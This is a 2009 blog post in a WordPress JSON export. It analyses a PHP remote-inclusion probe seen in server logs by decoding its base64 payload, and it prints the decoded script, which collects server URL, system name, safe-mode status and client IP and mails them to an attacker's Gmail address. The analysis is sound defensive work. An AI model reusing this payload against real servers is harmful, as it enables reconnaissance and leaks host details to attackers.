{"id":173,"date":"2009-04-11T10:52:34","date_gmt":"2009-04-11T02:52:34","guid":{"rendered":"http:\/\/www.computersolutions.cn\/blog\/?p=173"},"modified":"2009-04-11T21:57:55","modified_gmt":"2009-04-11T13:57:55","slug":"some-remote-exploit-analysis","status":"publish","type":"post","link":"https:\/\/www.computersolutions.cn\/blog\/2009\/04\/some-remote-exploit-analysis\/","title":{"rendered":"Some remote exploit analysis"},"content":{"rendered":"<p><strong>Foreword &#8211;<\/strong> <em>Note that none of our servers are vulnerable to remote inclusion attacks.<\/em><\/p>\n<p>For the most part, the exploits I covered in yesterday's post are common-or-garden PHP vulnerability scans.<br \/>\nSome are more interesting though, more for being obfuscated than for anything else.<\/p>\n<p>If I take an example from our log files:<br \/>\n<!--more--><\/p>\n<p>http:\/\/www.easy-dizzy.de\/joomla\/administrator\/includes\/js\/ThemeOffice\/copyright.txt <\/p>\n<p>This returns a base64-encoded string.<br \/>\nIt's fairly easy to see what's been returned in that, merely by changing the eval to an echo.<\/p>\n<pre lang=\"php\">\r\n\/\/Edited slightly for width purposes\r\n$lmge = \"JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NMnhzUUdkdFlXb\".\r\n\"HNMbU52YlE9PSIpOw0KKCRzYWZlX21vZGUpPygkc2FmZXo9\".\r\n\"Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRw\".\r\n\"Oi8vIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFU\".\r\n\"VVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGl\".\r\n\"wID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0\".\r\n\"aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3V\".\r\n\"iaiA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIl\".\r\n\"xuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXBhc3M6\".\r\n\"ICRieXBhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7D\".\r\n\"QokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iLiRzYWZlei4iPHRv\".\r\n\"b2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCgg\".\r\n\"JGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZn JvbSk7\"; 
\r\n\r\n\/\/eval(base64_decode($lmge));\r\n\r\n\/\/To stop execution and merely see the script contents, we echo it instead of eval.\r\necho (base64_decode($lmge));\r\nexit;\r\n\r\n<\/pre>\n<p>This outputs the following:<\/p>\n<pre lang=\"php\">\r\n$creator=base64_decode(\"ZnIzM3NoM2xsQGdtYWlsLmNvbQ==\"); \r\n\r\n($safe_mode)?($safez=\"ON\"):($safez=\"OFF_HEHE\");\r\n$base=\"http:\/\/\".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; \r\n$name = php_uname(); $ip = getenv(\"REMOTE_ADDR\"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; \r\n$msg = \"\\nBASE: $base\\nuname a: $name\\nBypass: $bypasser\\nIP: $ip\\nHost: $ip2 $pwds\";\r\n$from =\"From: \".$writ.\"___=\".$safez.\"<tool@\".$_SERVER['HTTP_HOST'].\">\";\r\nmail( $creator, $subj, $msg, $from);\r\n<\/pre>\n<p>So in this case we can see the attacker wants us to email him our server details, the URL that worked for the exploit, and various PHP details.<\/p>\n<p>If we look at the email address the script mails to, we can see it's a Google account.<\/p>\n<pre lang=\"php\">\r\necho base64_decode(\"ZnIzM3NoM2xsQGdtYWlsLmNvbQ==\");   \/\/returns fr33sh3ll@gmail.com\r\n<\/pre>\n<p>Google has been notified about that account.<br \/>\nAll in all, slightly more interesting than the usual!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Foreword &#8211; Note that none of our servers are vulnerable to remote inclusion attacks. For the most part, the exploits I covered in yesterday's post are common-or-garden PHP vulnerability scans. Some are more interesting though, more for being obfuscated than for anything else. 
If I take an example from our [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[48,25],"tags":[53,52,54,51],"class_list":["post-173","post","type-post","status-publish","format-standard","hentry","category-exploits","category-technical-mumbo-jumbo","tag-exploit","tag-hack","tag-php","tag-remote-inclusion"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/173","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/comments?post=173"}],"version-history":[{"count":4,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/173\/revisions"}],"predecessor-version":[{"id":180,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/173\/revisions\/180"}],"wp:attachment":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/media?parent=173"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/categories?post=173"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/tags?post=173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}